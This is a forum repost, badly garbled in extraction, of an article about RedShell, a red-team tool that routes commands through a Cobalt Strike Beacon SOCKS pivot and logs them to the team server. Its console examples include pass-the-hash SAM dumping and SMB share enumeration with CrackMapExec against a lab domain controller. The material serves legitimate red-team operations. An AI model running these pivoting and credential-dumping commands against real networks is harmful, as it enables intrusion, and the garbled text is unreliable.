搜索

[16297] 2021-01-08_通过RedShell将命令执行记录在CobaltStrike团队服务器中

文档创建者:s7ckTeam
浏览次数:4
最后更新:2025-01-18
2021-01-08_通过RedShell将命令执行记录在CobaltStrike团队服务器中 R e d S h e l l C o b a l t   S t r i k e A l p h a _ h 4 c k   F r e e B u f   2 0 2 1 - 0 1 - 0 8 R e d S h e l l 广 p r o x y c h a i n s C o b a l t   S t r i k e 广 使 R e d S h e l l P y t h o n   3 P y t h o n   3 R e d S h e l l C o b a l t   S t r i k e p r o x y c h a i n s - n g h t t p s : / / g i t h u b . c o m / r o f l 0 r / p r o x y c h a i n s - n g a g s c r i p t 使 使 C o b a l t   S t r i k e B e a c o n s o c k s 使 使 R e d S h e l l g i t   c l o n e   h t t p s : / / g i t h u b . c o m / V e r i z o n / r e d s h e l l . g i t p i p 3   i n s t a l l   - r   r e q u i r e m e n t s . t x t a p t   i n s t a l l   p r o x y c h a i n s 4 c h m o d   + x   a g s c r i p t . s h $   p y t h o n 3   r e d s h e l l . p y                                 _ _ _ _                       _ _ _ _ _ _ _   _ _                   _ _ _ _                               /   _ _   _ _ _     _ _ _ _ /   /   _ _ _ / /   / _     _ _ _     /   /   /                             /   / _ /   /   _   /   _ _     / _ _   /   _ _   /   _   /   /   /                           /   _ ,   _ /     _ _ /   / _ /   / _ _ _ /   /   /   /   /     _ _ /   /   /                             / _ /   | _ | _ _ _ / _ _ , _ / / _ _ _ _ / _ /   / _ / _ _ _ / _ / _ / R e d S h e l l > R e d S h e l l >   h e l p D o c u m e n t e d   c o m m a n d s   ( u s e   ' h e l p   - v '   f o r   v e r b o s e / ' h e l p   < t o p i c > '   f o r   d e t a i l s ) : = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = b e a c o n _ e x e c     c o n n e c t           h e l p                   p w d       s h e l l                 u s e _ p i v o t c d                       d i s c o n n e c t     h i s t o r y             q u i t     s h o w _ p i v o t s c o n f i g               e x i t                 l o a d _ c o n f i g     s e t       s t a t u s
C o b a l t   S t r i k e C o b a l t   S t r i k e C o b a l t   S t r i k e R e d S h e l l R e d S h e l l >   s e t   o p t i o n   V A L U E R e d S h e l l >   s e t   c s _ h o s t   1 2 7 . 0 . 0 . 1 R e d S h e l l >   s e t   c s _ p o r t   5 0 0 5 0 R e d S h e l l >   s e t   c s _ u s e r   s o m e d u d e R e d S h e l l >   c o n n e c t E n t e r   C o b a l t   S t r i k e   p a s s w o r d : C o n n e c t i n g . . .   C S   t e a m   s e r v e r   s t a t u s     C o n n e c t e d   v i a   s o m e d u d e _ r e d s h e l l @ 1 2 7 . 0 . 0 . 1 : 5 0 0 5 0                 S o c k s   p o r t   s t a t u s             D i s c o n n e c t e d                                                                                     $   c a t   c o n f i g . t x t c s _ h o s t = 1 2 7 . 0 . 0 . 1 c s _ p o r t = 1 2 3 4 5 c s _ u s e r = s o m e d u d e R e d S h e l l >   l o a d _ c o n f i g   c o n f i g . t x t C o n f i g   a p p l i e d :                               R e d s h e l l   i n s t a l l   d i r e c t o r y     / o p t / r e d s h e l l                                                                                     P r o x y c h a i n s   c o n f i g                     / o p t / r e d s h e l l / p r o x y c h a i n s _ r e d s h e l l . c o n f                                 C S   i n s t a l l   d i r e c t o r y                 / o p t / c o b a l t s t r i k e                                                                             C S   t e a m   s e r v e r                             1 2 7 . 0 . 0 . 1                                                                                             C S   t e a m   s e r v e r   p o r t                   5 0 0 5 0                                                                                                     C S   u s e r                                           s o m e d u d e _ r e d s h e l l                                                                             S o c k s   p o r t                                                                                                                                                   B e a c o n   P I D                                                                                                                                                   P a s s w o r d                                                                                                                                                     E n t e r   C o b a l t   S t r i k e   p a s s w o r d :
  C S   t e a m   s e r v e r   s t a t u s     C o n n e c t e d   v i a   s o m e d u d e _ r e d s h e l l @ 1 2 7 . 0 . 0 . 1 : 5 0 0 5 0                 S o c k s   p o r t   s t a t u s             D i s c o n n e c t e d                                                                                     R e d S h e l l >   s h o w _ p i v o t s   I D           A l i v e       S o c k s   P o r t         P I D                   U s e r                                               C o m p u t e r                                       L a s t                     1             T r u e         2 2 2 0 0                   8 9 4 8                 A d m i n i s t r a t o r   *                         W S 0 2                                               1 6 m s                     2             T r u e         5 4 2 1 2                   7 2 2 4                 A d m i n i s t r a t o r   *                         W S 0 3                                               3 9 m s                   R e d S h e l l >   u s e _ p i v o t   2   C S   t e a m   s e r v e r   s t a t u s     C o n n e c t e d   v i a   s o m e d u d e _ r e d s h e l l @ 1 2 7 . 0 . 0 . 1 : 5 0 0 5 0                           S o c k s   p o r t   s t a t u s             C o n n e c t e d   v i a   s o c k s   p o r t   5 4 2 1 2   @   b e a c o n   P I D   7 2 2 4                       R e d S h e l l >   c o n f i g   R e d s h e l l   i n s t a l l   d i r e c t o r y     / o p t / r e d s h e l l                                                                                     P r o x y c h a i n s   c o n f i g                     / o p t / r e d s h e l l / p r o x y c h a i n s _ r e d s h e l l . c o n f                                 C S   i n s t a l l   d i r e c t o r y                 / o p t / c o b a l t s t r i k e                                                                             C S   t e a m   s e r v e r                             1 2 7 . 0 . 0 . 1                                                                                             C S   t e a m   s e r v e r   p o r t                   5 0 0 5 0                                                                                                     C S   u s e r                                           s o m e d u d e _ r e d s h e l l                                                                             S o c k s   p o r t                                                                                                                                                   B e a c o n   P I D                                                                                                                                                   P a s s w o r d                                                                                                                                                    
B e a c o n   s o c k s 使 s u d o p r o x y c h a i n s b e a c o n _ e x e c 使 s h e l l 使 $ p a s s w o r d R e d S h e l l C S R e d S h e l l s h e l l ! R e d S h e l l T a b C T R L +   l R e d S h e l l >   s t a t u s   C S   t e a m   s e r v e r   s t a t u s     C o n n e c t e d   v i a   s o m e d u d e _ r e d s h e l l @ 1 2 7 . 0 . 0 . 1 : 5 0 0 5 0                           S o c k s   p o r t   s t a t u s             C o n n e c t e d   v i a   s o c k s   p o r t   5 4 2 1 2   @   b e a c o n   P I D   7 2 2 4                       R e d S h e l l >   b e a c o n _ e x e c   - h u s a g e :   b e a c o n _ e x e c   [ - h ]   [ - t   T T P ]   . . . E x e c u t e   a   c o m m a n d   t h r o u g h   p r o x y c h a i n s / b e a c o n   s o c k s   p r o x y   a n d   s i m u l t a n e o u s l y   l o g   i t   t o   t h e   t e a m s e r v e r . p o s i t i o n a l   a r g u m e n t s :     c o m m a n d                         C o m m a n d   t o   e x e c u t e   t h r o u g h   t h e   p r o x y . o p t i o n a l   a r g u m e n t s :     - h ,   - - h e l p                   s h o w   t h i s   h e l p   m e s s a g e   a n d   e x i t     - t   T T P ,   - - t t p   T T P     M I T R E   A T T & C K   T a c t i c   I D s .   C o m m a   d e l i m i t e d   t o   s p e c i f y   m u l t i p l e . e x a m p l e : b e a c o n _ e x e c   - t   T 1 0 0 3 , T 1 0 7 5   c m e   s m b   - - l o c a l - a u t h   - u   A d m i n i s t r a t o r   - H   C 7 1 3 B 1 D 6 1 1 6 5 7 D 0 6 8 7 A 5 6 8 1 2 2 1 9 3 F 2 3 0   - - s a m   1 9 2 . 1 6 8 . 1 . 1 R e d S h e l l >   b e a c o n _ e x e c   c m e   s m b   1 9 2 . 1 6 8 . 1 . 1 4 [ p r o x y c h a i n s ]   c o n f i g   f i l e   f o u n d :   / e t c / p r o x y c h a i n s . c o n f [ p r o x y c h a i n s ]   p r e l o a d i n g   / u s r / l i b / x 8 6 _ 6 4 - l i n u x - g n u / l i b p r o x y c h a i n s . s o . 4 [ p r o x y c h a i n s ]   D L L   i n i t :   p r o x y c h a i n s - n g   4 . 1 4 [ p r o x y c h a i n s ]   S t r i c t   c h a i n     . . .     1 2 7 . 0 . 0 . 1 : 4 8 1 9 9     . . .     1 9 2 . 1 6 8 . 1 . 1 4 : 4 4 5     . . .     O K [ p r o x y c h a i n s ]   S t r i c t   c h a i n     . . .     1 2 7 . 0 . 0 . 1 : 4 8 1 9 9     . . .     1 9 2 . 1 6 8 . 1 . 1 4 : 1 3 5     . . .     O K [ p r o x y c h a i n s ]   S t r i c t   c h a i n     . . .     1 2 7 . 0 . 0 . 1 : 4 8 1 9 9     . . .     1 9 2 . 1 6 8 . 1 . 1 4 : 4 4 5     . . .     O K S M B                   1 9 2 . 1 6 8 . 1 . 1 4         4 4 5         T E S T N E T - D C 1             [ * ]   W i n d o w s   S e r v e r   2 0 0 8   R 2   S t a n d a r d   7 6 0 1   S e r v i c e   P a c k   1   x 6 4   ( n a m e : T E S T N E T - D C 1 )   ( d o m a i n : T E S T N E T )   ( s i g n i n g : T r u e )   ( S M B v 1 : T r u e ) R e d S h e l l >   s e t   p a s s w o r d   T e s t 1 2 3 4 5 p a s s w o r d   -   w a s :   ' ' n o w :   ' T e s t 1 2 3 4 5 ' R e d S h e l l >   b e a c o n _ e x e c   c m e   s m b   - - l o c a l - a u t h   - u   a d m i n i s t r a t o r   - p   $ p a s s w o r d   - - s h a r e s   1 9 2 . 1 6 8 . 1 . 1 4 R e d S h e l l >   s e t   r e d s h e l l _ d i r e c t o r y   / o p t / r e d s h e l l R e d S h e l l >   s e t   c s _ d i r e c t o r y   / o p t / c o b a l t s t r i k e R e d S h e l l >   c d   / o p t / r e d s h e l l / R e d S h e l l >   p w d / o p t / r e d s h e l l R e d S h e l l >   s h e l l   d a t e M o n   2 9   J u l   2 0 1 9   0 5 : 3 3 : 0 2   P M   M D T R e d S h e l l >   ! d a t e M o n   2 9   J u l   2 0 1 9   0 5 : 3 3 : 0 3   P M   M D T R e d S h e l l >   h i s t o r y         1     l o a d _ c o n f i g   c o n f i g . t x t         2     s t a t u s         3     h e l p
A p a c h e   2 . 0 R e d S h e l l h t t p s : / / g i t h u b . c o m / V e r i z o n / r e d s h e l l
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理